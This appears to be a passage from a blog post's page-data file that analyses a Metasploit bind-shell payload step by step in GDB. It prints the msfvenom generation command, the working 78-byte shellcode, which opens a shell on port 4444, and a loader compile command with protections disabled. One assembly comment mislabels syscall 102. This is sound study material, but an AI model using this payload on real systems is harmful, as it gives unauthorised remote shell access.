{"componentChunkName":"component---src-templates-blog-post-js","path":"/blog/msf-payload-analysis-i/","result":{"data":{"site":{"siteMetadata":{"title":"nnfewl's Blog","author":"nnfewl"}},"mdx":{"id":"6b64926d-21bf-5a94-adaf-8a76f166b389","excerpt":"This note is about the analysis of Metasploit framework generated shellcode. OS: Ubuntu 16.04 32 bit Debugger: GDB Plug-in: pwndbg Payload: linux/x86/shell_bind…","body":"function _extends() { _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsx mdx */\nvar _frontmatter = {\n \"title\": \"MSF Payload Analysis I\",\n \"date\": \"2020-06-18\",\n \"tags\": [\"shellcode\", \"metasploit\", \"dynamic analysis\"]\n};\n\nvar makeShortcode = function makeShortcode(name) {\n return function MDXDefaultShortcode(props) {\n console.warn(\"Component \" + name + \" was not imported, exported, or provided by MDXProvider as global scope\");\n return mdx(\"div\", props);\n };\n};\n\nvar layoutProps = {\n _frontmatter: _frontmatter\n};\nvar MDXLayout = \"wrapper\";\nreturn function MDXContent(_ref) {\n var components = _ref.components,\n props = _objectWithoutProperties(_ref, [\"components\"]);\n\n return mdx(MDXLayout, _extends({}, layoutProps, props, {\n components: components,\n mdxType: \"MDXLayout\"\n }), mdx(\"p\", null, \"This note is about the analysis of Metasploit framework generated shellcode.\"), mdx(\"ul\", null, mdx(\"li\", {\n parentName: \"ul\"\n }, mdx(\"p\", {\n parentName: \"li\"\n }, \"OS: Ubuntu 16.04 32 bit\")), mdx(\"li\", {\n parentName: \"ul\"\n }, mdx(\"p\", {\n parentName: \"li\"\n }, \"Debugger: GDB\")), mdx(\"li\", {\n parentName: \"ul\"\n }, mdx(\"p\", {\n parentName: \"li\"\n }, \"Plug-in: pwndbg\")), mdx(\"li\", {\n parentName: \"ul\"\n }, mdx(\"p\", {\n parentName: \"li\"\n }, \"Payload: linux/x86/shell_bind_tcp\"))), mdx(\"h2\", null, \"Prerequisite\"), mdx(\"p\", null, \"Generate shellcode:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ msfvenom -p linux/x86/shell_bind_tcp -f c \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token assign-left variable\"\n }), \"LHOST\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0.0\"), \".0.0 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token assign-left variable\"\n }), \"LPORT\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"4444\"), \" -b \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"\\\\\"), \"x00\"))), mdx(\"p\", null, \"Output (Payload size: 78 bytes):\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"c\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"unsigned\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"char\"), \" buf\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"[\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"]\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"\\\"\\\\x31\\\\xdb\\\\xf7\\\\xe3\\\\x53\\\\x43\\\\x53\\\\x6a\\\\x02\\\\x89\\\\xe1\\\\xb0\\\\x66\\\\xcd\\\\x80\\\"\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"\\\"\\\\x5b\\\\x5e\\\\x52\\\\x68\\\\x02\\\\x00\\\\x11\\\\x5c\\\\x6a\\\\x10\\\\x51\\\\x50\\\\x89\\\\xe1\\\\x6a\\\"\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"\\\"\\\\x66\\\\x58\\\\xcd\\\\x80\\\\x89\\\\x41\\\\x04\\\\xb3\\\\x04\\\\xb0\\\\x66\\\\xcd\\\\x80\\\\x43\\\\xb0\\\"\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"\\\"\\\\x66\\\\xcd\\\\x80\\\\x93\\\\x59\\\\x6a\\\\x3f\\\\x58\\\\xcd\\\\x80\\\\x49\\\\x79\\\\xf8\\\\x68\\\\x2f\\\"\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"\\\"\\\\x2f\\\\x73\\\\x68\\\\x68\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe3\\\\x50\\\\x53\\\\x89\\\\xe1\\\\xb0\\\"\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"\\\"\\\\x0b\\\\xcd\\\\x80\\\"\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\")))), mdx(\"p\", null, \"Compile \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"loader.c\"), \" file into \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"msf_bind_shell\"), \"executable:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"bash\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-bash\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-bash\"\n }), \"$ gcc -m32 -fno-stack-protector -z execstack load.c -o msf_bind_shell\"))), mdx(\"p\", null, mdx(\"strong\", {\n parentName: \"p\"\n }, \"Note:\"), \" Before launch gdb, I do recommend to use some handy tools to boost this analysis process, cause constantly typing \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"disassemble\"), \" or \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"x/gbwx $esp/$eip/...\"), \" hunts my finger. For example, gdb pwn dev extensions like \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://github.com/pwndbg/pwndbg\"\n }), \"pwndbg\"), \" or \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://github.com/hugsy/gef\"\n }), \"gef\"), \", both were very fine gdb plug-in which can give you a colorful prompt at each breakpoint or interrupt your encountered, containing detailed information like register value, stack layout, etc. In this case, I use pwndbg to help me dissect the functionality of msf shellcode.\"), mdx(\"h2\", null, \"Dynamic Analysis\"), mdx(\"p\", null, \"Launch GDB:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ gdb -q ./msf_bind_shell\"))), mdx(\"p\", null, \"Disassemble the main function to locate memory address of shellcode entry point:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \" disassemble main\"))), mdx(\"p\", null, \"The entry point is located at the last \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"call\"), \" before function \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"ret\"), \". In my case, the shellcode entry point is at \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0x08048477\"), \".\"), mdx(\"p\", null, \"Then, set breakpoint at this location and run it:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin class-name\"\n }), \"break\"), \" *0x08048477\"))), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \" run\"))), mdx(\"p\", null, \"Now the program will hit this breakpoint, step into entry shellcode execution:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \" stepi\"))), mdx(\"p\", null, \"If you have \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://github.com/pwndbg/pwndbg\"\n }), \"pwndbg\"), \" plug-in installed before, you will now have this prompt displayed:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/ae7c434a0dcf5f31691788a558dc9c07/d9199/2020-06-15_10-51.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"73.64864864864865%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADcUlEQVQ4y22SWXPaVhiGdVMEEgquMdggFu1CCHS0sIglMTEmXrGdNK7TTq/CTX6DddMZ/5GWq170/7WZMzpvB0jqdtqLZ846z3zvOR/3tmyNPjTIUyyTR1Kwkq6oJW6mmXSyzcTlG4nLN5M230ycb+rbuZtVdmzONne2KI+drPLU4uvX3NwcPz14ZzireziRe5gcBJgWbAy+9TCt9HEsD3DSiBHve+hJbUR5B5HkINrzEBU623WYb2EguXAF7XfutDt7vG2/xnnJ/WNWsOlANOhg36T+ixaNyj4dlgidlH06OSQ0yJu0y2u0k1GpJxjUF01KBGPDn6FgoZ1TfuHOg9PkvXOMd5JCbwo6uxCa7DJTZ+eZGjvn62xadpkvNRiRHBbvB2x66LM3xoTFxQ4jWY35gsFITqfRRphV1txyuEzu22M8HO3Rt5UGe3fYxUVewVzYoGNW62JaczCujzEqBhjuuziWI/T3HJCcDl8w8Cxsrrmh6icLO8JCa9GZ3GKDgoO4YiAo++gpU/TLPkYlgtFhgECy4eUMdLMGiOTAf+HAFy0Q0aKbt2wL2ppzBCV5P7jA/fSKXpMTNtoIKjKGzQhhOYTHq/CyGjxeA8kZ24q+Qp7HXYU5Zc25op489Jf4EC/prTdnk3KAca2GWPYQFn344r8lW3LGLu5/IitrzskpyUP/Gj9Ob+kdWbBZbbitcFAJMGkcI5Ba8HLas+CLxBf0HTn9i9DcvWFw0E5uOgssvVO6MIbsVZVgfKRhtN/d9V1GRSi0EBZMkLwFIljwsjo80dpCRHMDjcQW2oK65q7CRfL9YIm4ROgbrcFuHBkLNcBZw8bLkobpgYVZVcf4yEJc7eFYGW8/aFj2MTzw4P9TmFPX3N3wIvlpcodIsumVKbN7UmWXepf9IFfZfaXOlhWLLZUam8s2W+gv2a0xYjd6zK6bfTarBCzMm5t+fI58QebJTXeBSSX8vFDV9MqU07nipWfVVjorqum06KV9wU4jwUwjwUh7vJpGWS2NRDsNX7TTQGqlRDQ/R/lNZO1Xrn/Y+Xlej/Fd7xJL9wSv6wPExS4GRQ+9PRdEMLe99jd5e4fUhp9vIdjum+jtIv/G6Xy1GxzYn07dycepGq5mdryKa2Q1qnursGSvrIy8svj/IVNZWZnq1/VHi6990jKVV38BA8mQq3gnz54AAAAASUVORK5CYII=')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"gdb-pwndbg\",\n \"title\": \"gdb-pwndbg\",\n \"src\": \"/static/ae7c434a0dcf5f31691788a558dc9c07/fcda8/2020-06-15_10-51.png\",\n \"srcSet\": [\"/static/ae7c434a0dcf5f31691788a558dc9c07/12f09/2020-06-15_10-51.png 148w\", \"/static/ae7c434a0dcf5f31691788a558dc9c07/e4a3f/2020-06-15_10-51.png 295w\", \"/static/ae7c434a0dcf5f31691788a558dc9c07/fcda8/2020-06-15_10-51.png 590w\", \"/static/ae7c434a0dcf5f31691788a558dc9c07/efc66/2020-06-15_10-51.png 885w\", \"/static/ae7c434a0dcf5f31691788a558dc9c07/d9199/2020-06-15_10-51.png 960w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"Before diving into assembly code, here is a quick rehearsal about each register\\u2019s functionality when calling syscall, the syscall interface under 32-bit Linux is provided through soft-interrupt \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0x80\"), \". The table below describes each register\\u2019s usage when evoking syscall.\"), mdx(\"table\", null, mdx(\"thead\", {\n parentName: \"table\"\n }, mdx(\"tr\", {\n parentName: \"thead\"\n }, mdx(\"th\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), \"Register\"), mdx(\"th\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), \"Usage\"))), mdx(\"tbody\", {\n parentName: \"table\"\n }, mdx(\"tr\", {\n parentName: \"tbody\"\n }, mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), mdx(\"code\", _extends({\n parentName: \"td\"\n }, {\n \"className\": \"language-text\"\n }), \"EAX\")), mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), \"Syscall number\")), mdx(\"tr\", {\n parentName: \"tbody\"\n }, mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), mdx(\"code\", _extends({\n parentName: \"td\"\n }, {\n \"className\": \"language-text\"\n }), \"EBX\")), mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), \"Argument 1\")), mdx(\"tr\", {\n parentName: \"tbody\"\n }, mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), mdx(\"code\", _extends({\n parentName: \"td\"\n }, {\n \"className\": \"language-text\"\n }), \"ECX\")), mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), \"Argument 2\")), mdx(\"tr\", {\n parentName: \"tbody\"\n }, mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), mdx(\"code\", _extends({\n parentName: \"td\"\n }, {\n \"className\": \"language-text\"\n }), \"EDX\")), mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), \"Argument 3\")), mdx(\"tr\", {\n parentName: \"tbody\"\n }, mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), mdx(\"code\", _extends({\n parentName: \"td\"\n }, {\n \"className\": \"language-text\"\n }), \"ESI\")), mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), \"Argument 4\")), mdx(\"tr\", {\n parentName: \"tbody\"\n }, mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), mdx(\"code\", _extends({\n parentName: \"td\"\n }, {\n \"className\": \"language-text\"\n }), \"EDI\")), mdx(\"td\", _extends({\n parentName: \"tr\"\n }, {\n \"align\": null\n }), \"Argument 5\")))), mdx(\"p\", null, \"Now move on, disassemble this frame by use \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"disassemble\"), \" or \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"x/43i $esp\"), \" command.\"), mdx(\"h3\", null, \"Socket() System call\"), mdx(\"p\", null, \"Assembly snippet 1:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"assembly\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-assembly\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-assembly\"\n }), \"0x0804a040 <+0>: xor ebx, ebx ; shellcode entrance\\n0x0804a042 <+2>: mul ebx ; set both eax, edx to 0x00000000\\n0x0804a044 <+4>: push ebx\\n0x0804a045 <+5>: inc ebx ; ebx now holds value 1\\n0x0804a046 <+6>: push ebx\\n0x0804a047 <+7>: push 0x2\\n0x0804a049 <+9>: mov ecx, esp ; ecx holds stack address which point to value 2\\n0x0804a04b <+11>: mov al, 0x66 ; assign 102 to register al which calling sys_getuid\\n0x0804a04d <+13>: int 0x80\"))), mdx(\"p\", null, \"The above code indicates that first, it zeroes out register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EBX\"), \", so does register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EAX\"), \" and register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EDX\"), \", and push \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EBX\"), \" into the current stack frame, after that, it increments 1 for \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EBX\"), \" and push it into the stack followed another push to push \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0x2\"), \" into the stack again.\"), mdx(\"p\", null, \"Now the stack frame will look like this:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"assembly\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-assembly\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-assembly\"\n }), \" Address Stack\\n +------------+\\n .... | .... |\\n +------------+\\nesp \\u2014\\u25B8 0xbfffef60 | 0x00000002 |\\n +------------+\\n 0xbfffef64 | 0x00000001 |\\n +------------+\\n 0xbfffef68 | 0x00000000 |\\n +------------+\\n .... | .... |\\n +------------+\"))), mdx(\"p\", null, \"Next instruction moves \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"ESP\"), \"\\u2019s value to register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"ECX\"), \" and move \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0x66\"), \" (decimal 102) into 8-bit sub-register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"AL\"), \" from \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EAX\"), \". Now it\\u2019s clear that the program has \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EBX\"), \" (Argument 1) holds 1 refer to the actual sub-function \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/socket.2.html\"\n }), \"socket\")), \" and \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"ECX\"), \" (argument 2) holds the reference to argument array passed to the sub-function \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/socket.2.html\"\n }), \"socket\")), \" with syscall number 102 which stands for \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_32.tbl\"\n }), \"sys_socketcall\"), \" system call.\"), mdx(\"p\", null, \"pwngdb plug-in had register listed out before execute \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"int 0x80\"), \":\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/51555e8c749f7d00b3c7dde0e46dbcec/d9199/2020-06-16_22-47.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"70.94594594594594%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADTklEQVQ4y2WSS28iVxCFWY37RfOIsbHdNNBvoOm+/eKNoZkoZmzMTMzYiywiJfJm/oTTiyycXmSRPztKrnxPBFaiSWbxqVSlq9I5dU9h5cwul+3h8+REffKrbhaWO9msqGVEdrJFc5CtjEl22UyyHq9lrqBnrqhnfVHPXMnIXMl8nQnaLz1B+9XkGn7hyk2fP5J3mF94iMtdJBUPUbGDoNhFXHKRyK+Eoo1QtBDwFghnIpR7iMr7t11EkoNY6sLim58Kt/H66b6/xPVx6/Oq3KaLkk1nXItOuRadcC06qJg0kNs0LLl0WPHptE5oqiY0km3qcxolvP4X4fU/CW/AOlJ+LmyHm+yhO8FDrUp3Z232/qTP3opttuRUthIMNq112LBms8ExYaOKz6Z1wlI1YbHsMJ/TGOH1PS+BcFj4WFias2xjTnCjmPRK6bFlzUdSc0COu4iqIQbVPuYXCcY1D55gwOMN9I90+JINUuqBSDYjovUSSDYsXn0s9AUtu4+2uIu3dON+x8YnPiYXCpJ6gKDiwuN1uJwGj9NBBBNE/BILRDAYEYyXQDBhcY3HQly3s90oxfeTBb2JpmzW6GN8rmBYj7FophhJJkZ8G5Fowuf1f/E4DT6/53+WPVnLYtnClqR0rXfYrNrA9BsXQ8lCzOtIeA2JaCCUjIOqvbVQshDJzqEeFh4UGrA45bFAZDPbOCvswjW904dsfdpDeqxgUethXDQwfqNiWLIQlXUERQdJ2cOw2sP8LMCg0v1aYV/Ss4d4g7toTbfkis0bY4zUcwzOE4zrM4TF7uGOPm/CF4wvLOuH/qsbrsxJ9sFfI22NadpM2Lctgy3VNkvVERsdh8wXbeZLFvPFfzAPkKLDSLFzmP3nlz+Ob55+vNwhlOzPcUmn936dbjsqvbVndC5bNDlq0SGv0aRk0VDWaFDq0kC09oGmRNhjUP8QbP012Lvh9fNP83uEvIWBbOCHQMGHjo73VoidruKd0sG1auDW1LA4D3DtvMXGSZFeJEiVAcbVPkLeRCzae8ufCitnskrN0R8O13zuiWq+ap/mE6WRz6rt/KpYy5fieT4/1fLkTMm9mptHzSSfNsN8aU7ycTPOu2I7dzj1tw6n/t5+c5b8DYtPdUMThMMeAAAAAElFTkSuQmCC')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"sys_socket\",\n \"title\": \"sys_socket\",\n \"src\": \"/static/51555e8c749f7d00b3c7dde0e46dbcec/fcda8/2020-06-16_22-47.png\",\n \"srcSet\": [\"/static/51555e8c749f7d00b3c7dde0e46dbcec/12f09/2020-06-16_22-47.png 148w\", \"/static/51555e8c749f7d00b3c7dde0e46dbcec/e4a3f/2020-06-16_22-47.png 295w\", \"/static/51555e8c749f7d00b3c7dde0e46dbcec/fcda8/2020-06-16_22-47.png 590w\", \"/static/51555e8c749f7d00b3c7dde0e46dbcec/efc66/2020-06-16_22-47.png 885w\", \"/static/51555e8c749f7d00b3c7dde0e46dbcec/d9199/2020-06-16_22-47.png 960w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"Scoketcall stands for socket system calls, here is the definition:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"c\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"socketcall\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" call\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"unsigned\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"long\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, 